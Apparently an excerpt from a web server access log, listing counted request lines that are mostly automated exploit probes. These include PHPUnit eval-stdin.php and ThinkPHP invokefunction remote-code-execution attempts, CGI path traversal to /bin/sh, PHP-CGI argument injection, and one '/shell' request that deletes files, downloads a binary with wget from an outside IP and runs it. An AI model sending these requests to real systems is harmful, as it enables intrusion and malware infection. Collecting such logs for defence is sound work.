1 GET /management/env HTTP/1.1
1 GET /management/mappings HTTP/1.1
1 GET /managements/;/env HTTP/1.1
1 GET /managements/ HTTP/1.1
1 GET /managements/env HTTP/1.1
1 GET /manager/html HTTP/1.1
1 GET /mappings.json HTTP/1.1
1 GET /modules/monitoring/ HTTP/1.1
1 GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /public/index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1
1 GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
5 GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.145.165.64/jaws;sh+/tmp/jaws
1 GET /swagger HTTP/1.1
1 GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webui/ HTTP/1.1
1 GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 HEAD / HTTP/1.1
1 HEAD /robots.txt HTTP/1.0
1 POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
1 POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
1 POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
3 PRI * HTTP/2.0
1 USER anonymous